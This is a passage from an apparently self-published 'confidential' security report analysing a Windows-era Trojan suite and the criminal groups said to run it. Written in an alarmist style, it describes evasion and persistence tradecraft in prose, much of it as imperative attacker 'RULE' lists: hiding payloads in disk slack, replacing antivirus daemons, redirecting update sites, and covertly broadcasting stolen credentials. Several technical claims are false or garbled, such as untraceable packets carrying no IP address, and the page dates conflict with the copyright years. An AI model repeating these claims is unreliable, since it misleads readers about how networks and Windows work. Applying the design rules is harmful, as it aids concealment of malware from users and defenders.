graphics card installed in the machine. In this hidden state, the Trojan exists in hibernation where it can stay
indefinitely. In the example scenario the Trojan re-immerged immediately. (Not a stealthy move, by the way.)
The re-boot of the machine after the re-install by the IT guy executed the Trojan core module in the
computer’s memory which contained a (quite normal) shadow copy of the video BIOS software contained in
the EEPROM. A two-byte “tweak” in the standard BIOS is all it takes to execute the core Trojan code that
was added in to an unused piece of the chip illicitly while the machine was previously compromised.
The Trojan core program then accessed the hidden disk partition and began executing a pre-scripted defense
protocol which involved, among other things, custom tweaks to the installer program’s INF or PIF files to
ensure that there was continued control and mitigation of possible risks to the Trojan. The Trojan then
updated its master as to what happened and what it did in response. The Trojan master thought it best to
get an updated copy of the files on the computer just in case the IT guy persisted, and so instructed the
Trojan BOT to implement a network-synchronized web share which automatically copied various directories to
a machine controlled by the Trojan Masters. The re-install was automatically altered while “on the way in”
while the IT guy was present, though there would be no way of him guessing what was happening. The
Trojan intercepts all installs via a custom “pinch point” MSI program that is designed to examine the
proposed install and then categorize the proposed install according to various rules.
These rules serve to describe some of the Trojan’s more interesting behaviors in response to changes in the
installation environment or active threats to its secrecy.
CONFIDENTIAL
Page 35 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
ANALYSIS OF HACKER SOFTWARE – Continued
Defining Terms
The following terms are used by the Trojan to categorize various user activities.
Dangerous
The incoming application is perhaps a discovery tool, capable, in the right hands, of piercing a hole in the
Trojan’s amour, leading to a possibility of some explicit exposure.
Or:
The application, if allowed to run normally, crashes when it encounters either a circumstance created by the
Trojan or a component of the Trojan itself. This creates a repeatable failure-mode, which may lead to
forensic investigation, and, in turn, lead to an explicit exposure.
Or:
The application in its normal operation innocently interferes with an aspect of the Trojan’s operations causing
the Trojan to crash with unpredictable consequences possibly leading to exposure of the Trojan’s crashed
programs, code or files.
Harmful
The incoming application in its normal operation innocently interferes with an aspect of the Trojan’s
operations causing the Trojan to lose a function or service neither program crashes and there is no possibility
of exposure.
Nullable
The dangerous or harmful aspects of the incoming application may be mitigated if the application is installed
with various features and options turned on - off or modified during the install process. This may include
making changes to the security context of the application or perhaps changes to the security permissions of
the user(s.) Many techniques are used to ‘null’, or eliminate harmful applications including but by no means
limited to:
Skinning: The application obscures harmful selection buttons or tabs with GIF images.
Pre or post-install modifications of default configuration files : The application makes defaults safe.
Radio button function reversal: YES=NO ENABLE=DISABLE
(Note above only used in combination with other techniques)
Full skinning user interface emulation of the application: The application’s visible controls are effectively
completely replaced by presenting the user only with a concurrently running compiled XML version of the
application user interface. This visible “shell” then accepts user input and applies filtering rules to the
commands before passing them on to the real program which is running unmodified in a different and
invisible memory arena. Visible feedback if any, from the real program, is captured by the XML simulator and
displayed / emulated back to the user.
AUTHOR’S NOTE: THE HACK TOOL THAT AUTOMATES THE SKINNING AND EMULATION OF AN
APPLICATION IS THE COOLEST SOFTWARE I HAVE EVER SEEN BAR NONE! WITH A LITTLE TWEAKING IT
COULD BECOME AN APPLICATION OPTIMIZER! AS A TROJAN TOOL IT IS A LIITLE TOO BLATENT.
After-the-fact changes to control options: Allows normal installation with defaults then either edits
configuration files, or establishes an OLE or ActiveX control to the offending setting. Thus, the Trojan may
dynamically disable and enable features as needed. This is a subset of the Trojan’s normal application
control suite.
CONFIDENTIAL
Page 36 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
ANALYSIS OF HACKER SOFTWARE - Continued
Useful
A large category. Many applications will have multiple areas of usefulness, examples are, and as usual, not
limited to:
Auto-update feature, especially if it is of the type, “Check for updates at startup.” (As opposed to a
reasonable schedule of some number of days) This automatic and implicitly trusted internet access will be
subject to a tricky redirect to a faked version of its update site were the application could receive a little more
of an update than it asked for, or the Trojan will treat this as an opportunity for some high speed downloads
and produce fake errors to buy extra time on the high speed line. Any benign app that has auto update is
well liked by the Trojan Masters.
Any web-enabled application-- these are golden! Examples are the various media players that have been
given a trusted access to go onto the internet whenever they run and perform some trivial task, like
download the song’s artist data or look for related web sites after a browser search, similar usefulness as the
previous case, but more often in the background, to tell-tale URLS and freedom for the Trojan to surf the
web albeit briefly.
Note: It is not just applications that are given these rights by the user and are used by the Trojan. Windows
XP has its own auto-update feature and can be set for full automatic spelling out heaven for our Trojan.
Trusted in background with unlimited time on line, the user has no knowledge of the task name, duration or
update site and best of all, its explicit permission to install any program with elevated privileges. Privileges
higher, in fact, than those of the user, which in turn give the Trojan implicit authority to add functions or
patches to the installed program with similar elevated privileges. (See privilege use and certificates)
PCHEALTH, discussed elsewhere, has these rights by default and you cannot turn them off!
Microsoft’s error reporting system is another operating system talker. At least it asks first, but given
permission, the Trojan can send it anywhere it likes. Our sneaky Trojan can even generate the error that
causes the need for the transmission in the first place. Thankfully, unlike PCHEALTH, you can disable the
service and turn it off.
Let us not forget the preemptive permission during the windows XP installation itself, Windows will invisibly
go onto the Internet and update its own installer giving our Trojan an early start with unlimited initial install
bandwidth. Truly a fast track to a fully mature take-over!
And what about all those security patches we are constantly admonished by Microsoft to download and check
up on regularly? Do we hesitate to patch right after an install? Nope, not usually. Do we carefully check the
URL when we go to Microsoft update? Nope! We do know that we are vulnerable to 1,800 known security
flaws, since the disk we just installed is the release version and the download patch is service patch #3
including several security rollup patches (Windows 2000), or maybe we need XP service release 1 plus
cumulative security rollup? Of course we do, but if we are already seeded, we may be sealing our fate since
it certainly is a “pinch point” to tweak the URL attached to the top icon on the start menu and we, the user,
would not dream of checking it before clicking it. No, because it is part of our operating system right?
Wrong!
The Trojan can, and does tweak this routinely, sending us of to an Alice in Wonderland version of Microsoft’s
familiar website, which includes thousands of cloned copies of the real website pages copied fresh each hour
by a Trojan BOT and checked by a real corporate hacker employee on “Micro-softie” duty that day. There
you can get real patches, sometimes (if benign) partial patches with reserved back doors. And while you are
there, deposit scads of your personal data for perusal by another corporate hacker on duty looking for valued
IP.
CONFIDENTIAL
Page 37 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
ANALYSIS OF HACKER SOFTWARE - Continued
Unknown
An unknown application may fall into three possible categories depending on the Trojan Masters’ settings. A
cautious controller that will treat an unknown as harmful and delay the install until a mitigating Trojan
module or patch can be obtained. A daring controller may take a chance and allow the install, patching on
the fly, spotting and tweaking helpful auto-updates and the like as they are installed, and with this, mitigate
various harmful traits. The third possibility is a little bit smarter; The Trojan will allow the application to
install into a controlled install environment hosted by yours truly. It will record the install sequence in detail,
then based upon the analysis of the resultant code, allow, fail, or mitigate the application. If allowed or
mitigated, it will pass the application on for a legitimate install into the real operating system.
Unknowns are also candidates for transmission in their entirety to Trojan Central, always on the lookout for
some new intellectual property.
Benign
Upon recognizing the proposed install as benign, neither useful nor harmful, the Trojan allows the install to
proceed either according to the unmodified PNF file (see later) or the INF file that accompanies the package.
When a useful feature of the application is recognized with the change files or patches on hand, the Trojan
allows the install but substitutes its own pre-compiled change file which installs a modified version of the
application for use by the Trojan. (e. g. change www. automatic-update. com TO www. automatic-update.
com/redir-ImakesureIownyoursystem. de)
When a Trojan finds an application it deems harmful yet “nullable” (made harmless in Trojan Master
Parlance) with a change file on hand, the Trojan, by means of the MSI installer program, installs, deletes
and/or modifies installed files as per instructions contained in the change file (Precompiled INF file) created
by combination of the original INF file shipped with the application and a “change list” downloaded from the
Trojan Master archives.
Applications recognized as harmful yet “nullable” WITHOUT PNF files on hand catch Trojans unprepared.
This can only happen in the very early stages of take over, when the full compliment of PNFs has yet to be
finished. There are over 300 native INFs to process and it is very disk-intensive and therefore allocated to
quiet time. Full processing can take several days. If challenged with a harmful application during this
vulnerable stage, the Trojan will resort to “fall-back” procedures created without the PNF to affect a
temporary “null” outcome. The Trojan will immediately request the specific PNF or change-file it needs by
broadcasting a FILE NEEDED request on all available channels and protocols. The Trojan will continue to
cycle through its fallback reports until the needed file arrives or the user gets tired of dumb error messages
and quits trying to install the harmful application.
CONFIDENTIAL
Page 38 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
ANALYSIS OF HACKER SOFTWARE - Continued
Fallback procedures
Fallback procedures vary all over the map. Examples include:
Allow install, but cripple the incoming application by scrambling portions of the executable during or postinstall causing the application to crash upon execution with the cause being explainable as a random data
corruption.
Implicitly disallow the install by means of crashing the installer or even faulting a critical kernel service, i.e.
the whole system (the “blue screen of death” page fault error) or (inline paged I/O Error)
Explicitly disallow the install by means of Trojan generated installation errors (real errors, set up or triggered
by Trojan intervention)
Explicitly disallow install, preventing installer from running and simulating partial install attempt followed by
bogus error messages such as:
“Your operating system configuration is incompatible with the application”
“This application is incompatible with your operating system”
(See bogus and dumb error messages for more of these gems)
“Disk error reading drive C: [Retry] [Quit]”
(The retry is just for authenticity--go ahead and quit)
CRC Error reading file <Name of Perfectly Readable File>
“BAD DISK”
(See Even Dumber Error messages for more of these classics)
Note Regarding PNF Files
Applications, drivers, and other software type are introduced to the system though a common methodology
by means of the MSI installer program. The MSI program installs the combination of files, data, programs,
images, icons etc., that form the components of any software according to a list of instructions written in
plain text and contained within a specialized scripting file which has the file-naming convention <name of
program>. INF.
From the point of view of Microsoft, this ensures consistent and correct registration, signature checking,
decryption, and version number checking of the incoming files. From the Trojan Master’s point of view, this
is a “pinch point” of power, a must-have high ground in the battle for control.
CONFIDENTIAL
Page 39 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
ANALYSIS OF HACKER SOFTWARE - Continued
Rules regarding PNF files
The reason for the PNF file rather than the customary plain INF file format is best explained by more rules:
RULE: If an application is harmful, create an INF that “nulls” it. However, change only that which is
essential and test, test, test the INF. And the change file, it must never crash! This might lead to an
exposure! IMPORTANT!
RULE: If you customize an INF file, never leave it in the INF folder. It is too easily read by a simple text
editor and could lead to an exposure! Keep incriminating INFs in the secret archive. IMPORTANT!
RULE: As soon as the MSI installer modification is installed, use the PNF factory tool to create custom PNFs
for not only the INFs native in the system INF folder, but also for the INFs in the secret archive. This will let
you free up archive space.
RULE: Always leave the normal non-customized INF file in the INF folder alongside the custom PNF file.
Investigators take the easy path first, which will appear normal and INF access can be rigged to trigger selfprotection procedures.
RULE: Always process all INF files to PNF files, even if there is no customization required. This avoids telltale processing inconsistencies and acts as obscuring “chaff” for the “guilty” PNFs.
RULE: Even if you totally own the system, continue to patch all “helpful” installs. They form layers of
backups essential should you lose a primary control point, or an update opportunity access control.
RULE: Protect your change list database files at all costs. They are one of the keys to power and are the
result of thousands of hours of effort. IMPORTANT!
CONFIDENTIAL
Page 40 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
ANALYSIS OF HACKER SOFTWARE - Continued
Dealing with Threats
The change list is, of course, extremely variable, but by way of example may contain any combination or
derivation though is, of course, not limited to, the following possibilities.
If presented with any one of the standard (or deluxe for that matter) anti virus, anti Trojan utility suites, our
smart Trojan calmly watches the install to determine the type and version number of the utility. It identifies
the kernel daemon(s.) (The programs that constantly run, and which are the eyes and ears of a virus or
Trojan checker.) The Trojan then waits for the installer to call for a reboot of the system—A required function
to install a kernel daemon. All programs begin to peel off, self- terminating as they reach safe points in their
execution cycles. A tidy closedown for all, including the anti-virus installer, having prepared and placed its
daemon in its launch position to commence duty on the next start-up. The Trojan closes most of its
programs, too. However, it will launch a small and very fast kernel thread as its last act. This kernel thread
will not be looking for a closedown point. Instead, the Trojan kernel thread hangs on grimly as the last of the
other programs bail out prior to power down. Here, our Trojan makes the first of several very clever and
exquisitely well-timed moves. The Trojan calls up from its private store of “software for all occasions,” the
precise variety of evil daemon twin required to patch, replace or simulate the threatening utility daemon, then
monitor the number of running threads reported by the processor doing nothing but paying very close
attention to the thread counter until the precise moment when it detects one and only one kernel thread left
running in the processor.
Clearly if there is only one kernel thread running and our Trojan uses a kernel thread, then that remaining
kernel thread IS our Trojan. For the briefest of moments between the time when the very last of the
straggler applications self-terminates and the operating system itself closes, the Trojan is alone with a
completely unprotected processor, registry, hard disk, everything! There is only the singular moment to act,
and act it does in a remarkable feat of precision timing. The Trojan erases the anti-virus daemon, yep the
one that was just created and left expecting to begin duty on power up! The Trojan substitutes the evil twin
impostor or patch and terminates itself! There being no other programs running, it is certain that the
imposter will launch successfully on reboot, looking for all the world like a good and honest virus checker.
CONFIDENTIAL
Page 41 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
ANALYSIS OF HACKER SOFTWARE – Continued
The Trojan Masters – History and Splinter Groups
We have investigated the history of this class of software and tried also to trace its roots to more primitive
versions of key elements. There are key elements of note, but it would not do this integration tour-de-force
justice to link it (With however many caveats) to any group of primitives. Truth is the typical Trojan, if there
is such a thing, draws from everything that is worthwhile, and in cases where there are a lot of good sources,
the Trojan goes ahead and overkills the functionality to the point of absurdity. More recent historical data
indicates that these programs were first introduced by certain foreign quasi-governmental groups in a
complete but immature and not very robust form late 2001. September thru December being the most
active. This weak progenitor software was quickly taken over by, as far as we can tell, at least three nonoriginator groups. Two apparently in the US and one in Europe. By March 2002, a third US based group had
modified the software and added much of its unique and important survivability traits. Many aspects of the
described software are not yet known to the security community or have been previously noted and
misunderstood in the context of an integrated suite of programs and dismissed or forgotten. We must also
acknowledge that there are crossover elements within the established security community which may have
played a part in intentionally obscuring the importance of these developments.
Certain operational aspects of the powerful software suites in use today are leaking out occasionally, eliciting
patchy responses from the security community and guarded research by computer and software
manufacturers.
Despite a healthy respect for the software as evidenced by my attempt at emotive writing on the subject, it is
by far more important to understand the significance of the existence of several effective, large scale,
anonymous hacker collaborations, each with an established departmental protocol, mediated by robust data
objects with defined functions and effectively administered security zones. --A structure, which seems to have
gained the general acceptance and agreement of all. (well, we have seen no dissenters with working
computers anyway). Its very existence and the fact that it can produce superior software products, effectively
maintain a large and profitable money flow, administrate a power, management and discipline structure,
albeit with a few breakaway groups, is truly revolutionary indeed.
We have data on how the management structure, permissions allocation, recruiting and departmental
structure enforcement software works. However, an adequate description may tip the balance of this
document back into the Chinese phone book category from whence it came. Suffice it to say it is, a tightly
reigned cooperative motivator par excellence with rewards (Cash) and punishments (No Cash) and, oh yeah,
the “nuke on sight” list. It clearly works and it is not really very “stoppable” at this point, so welcome to the
world scene, several new and permanent forces. It is a pity they are of the evil kind. I guess there is no way
to persuade you guys to stop all that bad stuff and use your powers for good to help the World?
Cyber Crooks
Along with this new software there has emerged a new hacker. One who is no longer a “lone wolf” writing
his own software. The new hacker works on a team. He may have assigned duties and, in what must be an
especially welcome change, he is paid a living wage. Previously we described our hacker adversaries, “the
WolfPak,” from the point of view of the “wolf cub” or “Script Kiddie” recruit. Now let us consider the role of
the highly qualified programmer.
Tech Officers
He operates within the same structure, but at a much higher level; he participates in a percentage of the take
and is paid a hefty retainer. One portion of his task is tech officer duty responding to the cries of Wolf Cub
teams who have run into errors they don’t know how to recover from, or perhaps directing a team of Cubs to
perform an IP address sweep of an automotive design center hoping to chance upon a particularly high value
design file. (A special request from a regular wealthy client.) A daily chore is two hours as the on-duty install
security manager, as each new zombie machine calls in to report its newfound zombie-hood.
CONFIDENTIAL
Page 42 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
ANALYSIS OF HACKER SOFTWARE - Continued
Zombies:
Compromised systems are programmed to call in and report their software and connectivity lists. These are
logged and scanned for anything that may be of interest or value and their “score” is recorded for the ”wolf
cub” that brought home the bacon. These zombies are then given a security “once over.” Then, depending
of what is needed or the specifications of a certain zombie, it is assigned a role in life. He may direct it to
become a web server, part of the voice over IP network, or part of an untraceable peer-to-peer musicswapping network. The zombies then request the required software modules and slowly, so as not to arouse
suspicion, take on their new place in life in addition to performing their duties to the folks who still think that
they are the zombie’s owner.
Extending the NameSpace
The Trojan software can essentially steal computers without them ever leaving home, integrating their
usurped resources into an ever growing sub-network or “NameSpace” who’s extent is known only by the
chiefs of a new type of organization--the structured hacking corporation, is amazingly complex. This new
software and the new type of clandestine organization that this awesome power will, inexorably and
inevitably, be molded by the forces of cyber-evolution into something that will change the World.
Hackers United
The Trojan software and the mature hacking corporation structure form an incredible feat of software and
human integration. The word “integration” is key to understanding the dramatic difference in the balance of
power which has occurred over the past two years in the field of computer security. With over two years of
intense research focused on the discovery and documentation of these integrated software suites, we have
managed to map the full extent of the various relationships and dependencies. The result of which is an
astonishing insight into what is about to become the next technological revolution.
Integration refers not only to the combination of the various software elements into a software suite but also
the integration of individual hackers into a global, coordinated team. Therein lies their true power. The
reader should note that it is this marshalling of human cooperation rather than any revolutionary
technological innovation, that has created an overwhelming new power and capability which, when
unleashed, will literally change our World. This power is already in action and fully operational. It is
deployed on a limited basis. I fear its potential for global damage and I fear also that the attached
documentation, if mishandled, has the potential of triggering various events, and escalations which we know
are pending release. Please be responsible with this document and place it in machine-readable form only if
you really know what you are doing. Please take to heart the following somewhat tongue-in-cheek but nonthe-less accurate paragraph.
While at the Microsoft security site, it is interesting to note that many security related bug reports are
concluded with a severity rating, “medium risk” etc. and an innocuous sounding note to the effect that there
could be a possibility that misuse of the vulnerability could lead to: “Execution of code of their choice” or
“Arbitrary code execution” or, “Unauthorized Read-Write Access,” “Execution of code with system level
privileges”, “Elevation of privileges” and so on. These relatively mild sounding consequences, could,
depending on who it is that is doing the executing, be better interpreted by the following, more accurate, and
much less innocuous consequence description:
YOU ARE TOTALLY WITHOUT HOPE. YOUR PRIVACY IS GONE, EVERY SCRAP OF DATA ON YOUR
COMPUTER IS NOW IN THE HANDS OF AN UNSRUPULOUS CRIMINAL ORGANIZATION, NO MATTER WHAT
YOU DO, YOU CAN NEVER EVER ERASE THIS COMPROMISE, YOU HAVE NO CHOICE BUT TO THROW OUT
NOT ONLY YOUR COMPUTER, BUT ALL THE COMPUTERS ON THE NETWORK, ALONG WITH A LARGE
PORTION OF THE NETWORK ITSELF. IN ADDITION, SINCE YOU DID NOT SPOT THIS PROBLEM IN LESS
THAN A SECOND, THE SAME APPLIES TO EVERYONE THAT YOU HAVE EVER SENT AN EMAIL TO.
CONFIDENTIAL
Page 43 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
ANALYSIS OF HACKER SOFTWARE - Continued
Design Rules
RULE: The initial starter executable should be extremely small and initially focus on remaining hidden until
automatically executed at a time sufficiently far away from the original breach so that the following goals are
achieved.
A: The target user feels that the breach has been dealt with and the system is secure.
B: Responses to the breach, such as; additional firewall programs, anti-virus checkers, changes in settings
etc. are complete and the system is stable.
C: Sufficient “normal” computer usage indicates that the system is trusted by the target user.
Target user’s confidence = High
Therefore:
Target user’s vigilance = Low
RULE: The starter executable should be designed to be as difficult as possible to discern its function through
direct examination of the code.
RULE: Starter should never include code that would attract an in-depth analysis. Specifically, it should not
reproduce itself, attach itself to any other file, modify high vigilance areas (Such as the boot sector), access
areas commonly used as virus vectors, modify or delete any other files.
RULE: The starter code should be written in such a way so that if it were discovered upon activation it
would, most likely be considered an innocuous curiosity, additional “distracter” code may be added to support
the notion that the code is a benign piece of flotsam © MicroSoft Inc. All Rights Reserved serves well as a
distracter.
RULE: Limit starter functionality to its core function. Namely: Broadcast the “Come & get me message” on
any and all available ports using any and all available protocols without regard to, “standard” conventions.
RULE: Using the best Crypto available, while sending “the message,” encode the following data only:
IP address, MAC address, user name, password, processor type, operating system major version number,
operating system minor version number, version number of starter kit, open port number (If any), Telnet
version number, fax number (if any), quiet time start hour, hacked by ID #.
RULE: Sufficient time must have passed between the initial security breach and the activation so that the
appearance of the curious executable and the penetration event would be considered non-connected events
alleviating suspicion that the starter code may be “Mal-Ware.”
The clandestine executable remains completely hidden, encrypted and compressed, separated into a number
of file fragments on the target hard disk drive and buried in the so called “cavities” formed by the unused
bytes always left empty between the non sector-aligned, “ragged” ends of all legitimate files and the
beginning of the next file which by convention is always started on the next sector boundary, a perfect hiding
place! There are many others just as secure.
CONFIDENTIAL
Page 44 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
ANALYSIS OF HACKER SOFTWARE - Continued
First Infection
When the timer which is set up on initial penetration indicates the coast is clear, the timer will launch a tiny
code fragment which is tasked with two missions: Decrypt and execute the first fragment of the broadcaster
code, destroy all traces of the timer, set up the decryption code and itself!
Each segment of the broadcaster is extracted from its cavity, decrypted, and re-assembled into an executable
by the previous section, in the case of the sector boundary cavity hiding places, each is small, perhaps 512
bytes in length, yet since there are thousands of cavities, code can be assembled to any desired length.
Once the broadcaster is complete, the decryption code is destroyed, and the broadcaster program begins a
sequence of calls to its master. The broadcast is by means of signals commonly used to coordinate network
component timings. This can take many forms but they all share the following characteristics:
Untraceable UDP communications.
All signals use low level IP formats and protocols that are common infrastructure “noise” everywhere.
These communications signals and are not in any way addressed to: or from: any system or individual, they
have no IP Address or MAC address, and are therefore untraceable. Being in the format of low-level Internet
infrastructure signals, they are routinely forwarded on their way without examination or comment, by any
computer receiving them, for these signals are what hold the Internet together. Internet connected
computers, web servers, switching routers and firewalls are the hardware of the Internet and their activity is
connected and coordinated signals such as these. These Datagrams and signals are generally considered
“safe data” since their normal function is to coordinate infrastructure related low-level machine
communications. Consequently, these signals are common and everywhere. Switchers are designed to pass
hundreds of kilobytes of this data without so much indication as a flash of a LED. The use of these protocols
ensures complete anonymity and counters traceability both forward and backwards.
CONFIDENTIAL
Page 45 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
ANALYSIS OF HACKER SOFTWARE – Continued
Rules Regarding Communications
RULE: All communications to and from the Master are to be one way broadcast signals. Even if protocol
allows for acknowledgment, it must not be used. There can only be one broadcaster and one passive listener
at a time.
RULE: Transmissions should be long in each direction. A rapid “ping–pong” of short exchanges exposes the
transmission as communications, allowing detection with a possibility of following the signal back to its source
during its transmission phases.
RULE: Similarly, the transmissions must never be allowed to appear “related” by similarity or be a
compliment of one another. Nothing that might tie broadcast and listen sessions together reveling them to
be part of the same conversation should be allowed.
RULE: Where possible, use datagram sizes and patterns of use, which are formulated to simulate as closely
as possible, the normal low-level protocol that is being emulated.
RULE: Datagrams are serialized for easy assembly, but must be encrypted during transmission. Resends of
partial files must not use the same encryption or serializations for fear of matching the broadcast and listen
relationship.
RULE: Emergency files can be sent by other means, but only from zombie computers. In general, if we have
time, we will build new zombies slowly and safely. Secrecy is paramount.
RULE: If possible place a highly concealed and very small executable on the target machine, if possible set
up a timed execution for a later date, thus remaining entirely flexible as to access methods and disconnecting
the entry event from the beginning of the Trojan take-over.
RULE: Secrete small executable using best available methods, but remain flexible so that any number of
available techniques can be used.
RULE: When the delay timer activates, use all possible protocols and transmission media to broadcast a nonroutable and therefore non-traceable IP broadcast signal which can be monitored remotely as a passive
listener
UDP & non-routable protocols
Since this system uses protocols that do not guarantee delivery and moreover lack the advantage of
acknowledgment of receipt and requests to re-send lost or timed out packets, there is a tendency to lose
data packets and they generally arrive hopelessly out of their correct sequences. Therefore, Datagrams are
sorted upon receipt and the files to which they belong are stage-assembled for a relatively long period of
time.
PC-HEALTH
These files lying out in the open while they accumulate all their data packets would present quite an easy to
spot Trojan indicator were it not for the that fact that this exact same system is already installed on every
Windows computer in the form of the PCHEALTH software update system. PCHEATH uses so called, “spare”
datagram bandwidth on top of the normal TCPIP surfing bandwidth to slowly build up the software updates
the computer needs. With a slight tweak, the Trojan masters have been able to blend perfectly into this
system by the simple expediency of giving their files temporary names drawn from any recent legitimate
installation. Thus, the Mal-Ware updates look just like updates coming from Microsoft, all perfectly normal.
As long as the pace is controlled, the machine’s performance isn’t hurt too much, and if the volume of files
doesn’t arouse suspicion, the Trojan’s ability to deliver large quantities of software to the target system is
virtually guaranteed.
CONFIDENTIAL
Page 46 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
ANALYSIS OF HACKER SOFTWARE – Continued
Behavior & Sources of Code
The volume of data loaded into these “zombies” is quite staggering. Between three and six gigabytes of
compressed data! The range of activities that can be elicited from the zombie is far greater than what
could be achieved with even a three to six gigabyte program suite. The operating system itself
typically ranges to about this size and the Trojan suite has matured over the last year to an almost
ridiculous level of sophistication, enabling the Master to command a vast array of actions and
responses to user actions without the need for software download. As it turns out, the custom code is
the tip of the iceberg and is dwarfed by the amount of code that is harnessed from the operating
system itself. More rules:
RULE: Never write custom code that has to be hidden when you could simply control the code that is there
for all to see as part of the operating system.
RULE: Scour the annals of the Microsoft online archives for long enough and you will be sure to find a
program to control every other program.
RULE: If you really cannot find a way to get the behavior from the native operating system code, get it from
a native application.
RULE: If that is not possible, better to import a piece of Microsoft code from a legacy operating system
rather than waste a piece of prime real estate in the form of the hidden archives. It’s all Microsoft legitimate
code, so what if it doesn’t belong there! If any user were to be knowledgeable enough to know for sure that
a piece of code does not belong, he will just go to the IT guy and point it out. The IT guy will probably not
know either. If he bothers to check, he will just take it out and remain convinced the user put it there, so
long as the secret archive is secure, let them scratch their heads!
By way of an example, some Trojans will install Information Interchange Server (IIS), a personal web server
program that is standard issue with Windows 2000 and XP discs. The private web server it forms is an
invaluable storage locker for standby software modules and the hacker team uses these servers for their own
communications network. This used to be is done routinely however, the fact that is not installed by default
provides investigators with a relatively easy “tell.” And its use has been gradually curtailed over the last year.
Nevertheless, this is an excellent example of using what is there so as not to arouse suspicion.
The Unexplained
For reasons we have to this day never been able to figure out, Trojaned Windows XP systems have their
“System Root” directory (normally WINDOWS) renamed to WINNT and Windows 2000 victims which are by
default named WINNT would find themselves renamed to WINDOWS. This was beginning to straighten out,
except for the occasional WINDOWS-NT Moniker. We have yet to complete these easy tell lists but we have
seen on many Trojaned machines lots of software that was lifted from other operating systems and still more
drawn from the Windows Resource kits or the IT professional toolkit on the web.
CONFIDENTIAL
Page 47 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
ANALYSIS OF HACKER SOFTWARE – Continued
Pinch Points
RULE: Place your control software to leverage large amounts of functionality out of small quantities of
control system code. Where possible, use the superior bang-per-byte ratio afforded by batch processing
scripts, data base driven automatic scripts, compile on demand DLL groupings and precompiled XML scripts.
Always focus the control effort on a naturally occurring “pinch point” of control.
An example of a pinch point is the MSI Installation system. If you can control this single small program, you
have the power to allow or deny the user the ability to install any program. You also have gained control of a
key survival tool. You control if and how a fresh so called “clean” install is performed.
As you will see, Pinch Point design is a key element of the truly remarkable survival aspects of these Trojans,
which we will discuss soon. The other category of Pinch Points revolve around the install scripts or INF files
which act as the master script for much of the operating software. The first install is equivalent if the INF file
is the SIF file (which the Trojan also controls.) Likewise with the system registry and the SAM or security
files. Many of the Trojans come with more creative responses to challenges related to the protection at all
costs of the Trojan’s control of these key pinch points.
The secret archive of 3 to 6 Gigabytes of highly leveraged code in the form of several thousand files must be
kept totally out of sight. This code cannot be passed off as native. Also included in this archive is the core of
the system’s intelligence and flexibility in the form of a large relational database.
The secrecy requirements associated with this archive are apparently a top priority of the Trojan masters.
This is the data which is not disguisable as native code and contains many clear references to the invasions
of privacy it is designed to perform. I expect that they feel exposure may lead an escalation of exposures to
senior IT professionals who could, in time duplicate the very same work which LoudWolf has done this last
year, and bring on the Security industry’s attention, reining in the hackers and ending this period of power
and immunity they are currently enjoying.
There is little chance that anyone could ever stumble by chance across the hidden archives. They are close
to impregnable even if you go looking for it, it is going to be very difficult to expose the custom software and
the glorious database file of responses and rules.
The Trojan masters, realizing that any Microsoft derived code disclosure, even if it is in the wrong place will
never pose a full disclosure threat, deployed upgrades to all of their systems adding-in some cases disarming
explanations as to how this or that code came to be there. At this same time we saw a tremendous amount
of effort going into various methods of beefing up the secret vault. Several techniques were tried, then we
saw experiments with two techniques used in tandem. It is difficult to determine just which is the approved
method for protecting the secret archive. All of the variants are still in active use. Worse still, we have seen
three Beta versions of the software which may have changed things once more, and let us not forget it is
ultimately the whim of the Master that determines what this thing is.
CONFIDENTIAL
Page 48 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
ANALYSIS OF HACKER SOFTWARE - Continued
The Various Secrets of the Secret Vault
Beginning with the PerfLib once again, this performance-monitoring tool measures any number of complex
hardware performance parameters, one of which is the frequency of successful cache hits. Many Trojans
unceremoniously take the counter system away and hidden from view. What is being hidden are the
performance counter statistics relating to hard disk “caching” in memory and the number of cache hits per
second, that is to say, the number of times that a particular piece of data was requested by the
microprocessor and successfully found after being placed in the much faster cache RAM storage memory
rather than having to be re-read from disk again. This is how it is supposed to work.
Hiding Places:
Cache Memory
The Hard disk cache memory is dynamically created by the operating system. Limits on its size can be set by
experienced users, but in general it is a shadowy place were Page Files and Swap files are kept. Caching is
